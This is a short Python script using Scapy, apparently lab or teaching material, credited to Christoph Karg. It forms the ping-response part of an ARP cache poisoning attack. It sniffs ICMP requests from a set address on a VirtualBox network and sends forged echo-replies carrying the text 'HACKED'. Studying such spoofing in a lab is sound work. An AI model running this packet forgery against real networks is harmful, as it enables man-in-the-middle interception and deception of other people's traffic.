#! /usr/bin/env python

# ******************************************************************************
# * Ping response (as a part of the ARP cache poisoning) with Scapy
# *
# * Christoph Karg (1.6.2016)
# ******************************************************************************

# Import all stuff from the scapy API
from scapy.all import *

#interface="wlp4s0"
interface="vboxnet0"

#
# Response to a ping.
#
# This function returns a Scapy prn function to react on a
# ping request for the given ip address.
#
# Parameters:
# - ip_addr : IP address which was pinged
#
def pingResponse(ip_addr):

	def nested_pr(pkt):
		if ICMP in pkt and pkt[IP].src==ip_addr:
			print pkt.summary()

			icmp_reply = pkt[ICMP]
			icmp_reply.type = "echo-reply"
			response = IP(src=pkt[IP].dst,dst=pkt[IP].src) / icmp_reply / "HACKED"

			del response[IP].chksum
			del response[ICMP].chksum
			response = response.__class__(str(response))	
			send(response, iface=interface, verbose=0)
			
			return response.summary()

	return nested_pr


#
# Main
#
#sniff(iface=interface, prn=pingResponse("192.168.0.72"), filter="icmp", store=0)
sniff(iface=interface, prn=pingResponse("192.168.56.102"), filter="icmp", store=0)

